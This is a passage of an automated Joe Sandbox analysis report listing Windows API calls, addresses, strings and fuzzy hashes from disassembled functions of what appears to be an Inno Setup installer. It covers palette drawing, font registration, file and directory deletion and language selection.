                                                                                            • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041B7F4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                            • String ID: %H
                                                                                            • API String ID: 3275473261-1959103961
                                                                                            • Opcode ID: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                            • Instruction ID: 38bdddf8d72f5571b31e8017bfcff87152bbfcb95d4f6cd7f9962c0a723fddb9
                                                                                            • Opcode Fuzzy Hash: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                            • Instruction Fuzzy Hash: 8A512F70A002099FDF11DFA9C881AEEBBF9FF49704F104066F504A7791D7799981CBA9
                                                                                            APIs
                                                                                            • GetFocus.USER32 ref: 0041BA17
                                                                                            • GetDC.USER32(?), ref: 0041BA23
                                                                                            • SelectPalette.GDI32(00000000,?,00000000), ref: 0041BA5D
                                                                                            • RealizePalette.GDI32(00000000), ref: 0041BA69
                                                                                            • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BA8D
                                                                                            • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041BAC1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                            • String ID: %H
                                                                                            • API String ID: 3275473261-1959103961
                                                                                            • Opcode ID: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                            • Instruction ID: 3fcaffe560058c7771eaec6053d79e0e1924f360d52694d27862de55114c0f48
                                                                                            • Opcode Fuzzy Hash: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                            • Instruction Fuzzy Hash: 9D512A74A002189FDB11DFA9C891AAEBBF9FF49700F154066F904EB751D738AD40CBA4
                                                                                            APIs
                                                                                              • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                              • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 00496585
                                                                                            • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00496599
                                                                                            • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 004965B3
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965BF
                                                                                            • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965C5
                                                                                            • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965D8
                                                                                            Strings
                                                                                            • Deleting Uninstall data files., xrefs: 004964FB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                            • String ID: Deleting Uninstall data files.
                                                                                            • API String ID: 1570157960-2568741658
                                                                                            • Opcode ID: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                            • Instruction ID: caddedc05ae4add9971b90b84c259ce0cd5246952d50e779d54ebc968ffbf915
                                                                                            • Opcode Fuzzy Hash: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                            • Instruction Fuzzy Hash: 73216170204250BFEB10EB6ABC82B2637A8DB54728F53453BB501961D6DA7CAC448A6D
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9,?,?,?,?,00000000), ref: 00470263
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9), ref: 0047027A
                                                                                            • AddFontResourceA.GDI32(00000000), ref: 00470297
                                                                                            • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004702AB
                                                                                            Strings
                                                                                            • Failed to open Fonts registry key., xrefs: 00470281
                                                                                            • AddFontResource, xrefs: 004702B5
                                                                                            • Failed to set value in Fonts registry key., xrefs: 0047026C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                            • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                            • API String ID: 955540645-649663873
                                                                                            • Opcode ID: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                            • Instruction ID: 122e39bb1ea2b43e4c2a7da55aa69ddad999e5e54c07bca5f4119535fc7344d3
                                                                                            • Opcode Fuzzy Hash: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                            • Instruction Fuzzy Hash: 6921E271741204BBDB10EAA68C46FAE67AC9B14704F208477B904EB3C3DA7C9E01866D
                                                                                            APIs
                                                                                              • Part of subcall function 00416410: GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                              • Part of subcall function 00416410: UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                              • Part of subcall function 00416410: RegisterClassA.USER32(?), ref: 004164CE
                                                                                            • GetVersion.KERNEL32 ref: 00462E60
                                                                                            • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462E9E
                                                                                            • SHGetFileInfo.SHELL32(00462F3C,00000000,?,00000160,00004011), ref: 00462EBB
                                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 00462ED9
                                                                                            • SetCursor.USER32(00000000,00000000,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462EDF
                                                                                            • SetCursor.USER32(?,00462F1F,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462F12
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                            • String ID: Explorer
                                                                                            • API String ID: 2594429197-512347832
                                                                                            • Opcode ID: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                            • Instruction ID: b0f6820fd5a5ea072646c086af9eca81c98a3cd1ffd9b7ca0f87214cf94a4ba1
                                                                                            • Opcode Fuzzy Hash: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                            • Instruction Fuzzy Hash: CD21E7307403047AEB15BB759D47B9A3798DB09708F4004BFFA05EA1C3EEBD9901966D
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02122BDC,?,?,?,02122BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02122BDC,?,?,?,02122BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                            • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02122BDC,?,?,?,02122BDC), ref: 004783CC
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,02122BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                                            • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                                            • API String ID: 2704155762-2318956294
                                                                                            • Opcode ID: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
                                                                                            • Instruction ID: 2a72e966618face2f1bd82d2a524167157479a72732682c44667b4342ad9b4bf
                                                                                            • Opcode Fuzzy Hash: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
                                                                                            • Instruction Fuzzy Hash: 370180A07C070536E520316A4C8AFBB654C8B50769F14863FBA1DFA2D3FDED9D06016E
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,00459F8E,?,00000000,00000000,00000000,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 00459ED2
                                                                                              • Part of subcall function 004543F4: FindClose.KERNEL32(000000FF,004544EA), ref: 004544D9
                                                                                            Strings
                                                                                            • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459F47
                                                                                            • Failed to delete directory (%d). Will retry later., xrefs: 00459EEB
                                                                                            • Failed to delete directory (%d)., xrefs: 00459F68
                                                                                            • Deleting directory: %s, xrefs: 00459E5B
                                                                                            • Stripped read-only attribute., xrefs: 00459E94
                                                                                            • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459EAC
                                                                                            • Failed to strip read-only attribute., xrefs: 00459EA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseErrorFindLast
                                                                                            • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                            • API String ID: 754982922-1448842058
                                                                                            • Opcode ID: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                                                            • Instruction ID: b8d9b7298ea7c3337bda5d500217c07e27fbd6b384233f4239b27a523d6d10d0
                                                                                            • Opcode Fuzzy Hash: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                                                            • Instruction Fuzzy Hash: 1841A331A04208CACB10EB69C8413AEB6A55F4530AF54897BAC01D73D3CB7C8E0DC75E
                                                                                            APIs
                                                                                            • GetCapture.USER32 ref: 00422EA4
                                                                                            • GetCapture.USER32 ref: 00422EB3
                                                                                            • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB9
                                                                                            • ReleaseCapture.USER32 ref: 00422EBE
                                                                                            • GetActiveWindow.USER32 ref: 00422ECD
                                                                                            • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F4C
                                                                                            • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FB0
                                                                                            • GetActiveWindow.USER32 ref: 00422FBF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                            • String ID:
                                                                                            • API String ID: 862346643-0
                                                                                            • Opcode ID: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                            • Instruction ID: c6261992695b47722d84ffa44129b55dc5b2a4dad2f70b0012283783c1c7b094
                                                                                            • Opcode Fuzzy Hash: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                            • Instruction Fuzzy Hash: 24417230B00245AFDB10EB69DA86B9E77F1EF44304F5540BAF404AB2A2D778AE40DB49
                                                                                            APIs
                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 0042F2BA
                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0042F2D1
                                                                                            • GetActiveWindow.USER32 ref: 0042F2DA
                                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F307
                                                                                            • SetActiveWindow.USER32(?,0042F437,00000000,?), ref: 0042F328
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveLong$Message
                                                                                            • String ID:
                                                                                            • API String ID: 2785966331-0
                                                                                            • Opcode ID: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                                                            • Instruction ID: ac844ef734d24c76dc9aa96f201b13a865b129e9c1b137beabd8cb6517960092
                                                                                            • Opcode Fuzzy Hash: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                                                            • Instruction Fuzzy Hash: F931D271A00254AFEB01EFA5DD52E6EBBB8EB09304F9144BAF804E3291D73C9D10CB58
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 0042948A
                                                                                            • GetTextMetricsA.GDI32(00000000), ref: 00429493
                                                                                              • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004294A2
                                                                                            • GetTextMetricsA.GDI32(00000000,?), ref: 004294AF
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004294B6
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 004294BE
                                                                                            • GetSystemMetrics.USER32(00000006), ref: 004294E3
                                                                                            • GetSystemMetrics.USER32(00000006), ref: 004294FD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
                                                                                            • String ID:
                                                                                            • API String ID: 1583807278-0
                                                                                            • Opcode ID: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                                                            • Instruction ID: 8a5b62ad3b2811282b00f4aa11bc4c2c065e9b9ae855548013837f5c18493421
                                                                                            • Opcode Fuzzy Hash: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                                                            • Instruction Fuzzy Hash: 0F01C4A17087103BE321767A9CC6F6F65C8DB44358F84043BF686D63D3D96C9C41866A
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 0041DE27
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041DE31
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041DE3E
                                                                                            • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE4D
                                                                                            • GetStockObject.GDI32(00000007), ref: 0041DE5B
                                                                                            • GetStockObject.GDI32(00000005), ref: 0041DE67
                                                                                            • GetStockObject.GDI32(0000000D), ref: 0041DE73
                                                                                            • LoadIconA.USER32(00000000,00007F00), ref: 0041DE84
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ObjectStock$CapsDeviceIconLoadRelease
                                                                                            • String ID:
                                                                                            • API String ID: 225703358-0
                                                                                            • Opcode ID: cf3de45f10179e040e4bf754cd3e00afbbff0486b0448c288d4be5e1939ebdb6
                                                                                            • Instruction ID: 282f56568f1177e4dad385ec7f61a974d29090d827cf1f87eb40c920fa9ca7e8
                                                                                            • Opcode Fuzzy Hash: cf3de45f10179e040e4bf754cd3e00afbbff0486b0448c288d4be5e1939ebdb6
                                                                                            • Instruction Fuzzy Hash: 4C1142706457015EE340BFA66E52B6A36A4D725708F40413FF609AF3D1D77A2C448B9E
                                                                                            APIs
                                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 00463344
                                                                                            • SetCursor.USER32(00000000,00000000,00007F02,00000000,004633D9), ref: 0046334A
                                                                                            • SetCursor.USER32(?,004633C1,00007F02,00000000,004633D9), ref: 004633B4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Cursor$Load
                                                                                            • String ID: $ $Internal error: Item already expanding
                                                                                            • API String ID: 1675784387-1948079669
                                                                                            • Opcode ID: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                                                            • Instruction ID: e4e85f4aa3fa623d7d3a169fbc538aa22306e9421cedfdc69a3031d12d347dae
                                                                                            • Opcode Fuzzy Hash: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                                                            • Instruction Fuzzy Hash: 4CB18270604284EFDB11DF29C545B9ABBF1BF04305F1484AAE8469B792DB78EE44CB4A
                                                                                            APIs
                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfileStringWrite
                                                                                            • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                            • API String ID: 390214022-3304407042
                                                                                            • Opcode ID: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                                                            • Instruction ID: 4c4b1d7f09994941c57eaafc4db68242d6a3f6c21ecd3f2b5b8f846a746055a2
                                                                                            • Opcode Fuzzy Hash: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                                                            • Instruction Fuzzy Hash: 40911434E002099BDB01EFA5D842BDEB7F5AF4874AF608466E90077392D7786E49CB58
                                                                                            APIs
                                                                                            • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00476CA9
                                                                                            • SetWindowLongW.USER32(00000000,000000FC,00476C04), ref: 00476CD0
                                                                                            • GetACP.KERNEL32(00000000,00476EE8,?,00000000,00476F12), ref: 00476D0D
                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476D53
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassInfoLongMessageSendWindow
                                                                                            • String ID: COMBOBOX$Inno Setup: Language
                                                                                            • API String ID: 3391662889-4234151509
                                                                                            • Opcode ID: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
                                                                                            • Instruction ID: b13fa11fcbd9abdf7db93726dac51e4442bd67f198c8610d2c1064f44be53319
                                                                                            • Opcode Fuzzy Hash: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
                                                                                            • Instruction Fuzzy Hash: 46812C346006059FDB10DF69D985AEAB7F2FB09304F15C1BAE808EB762D778AD41CB58
                                                                                            APIs
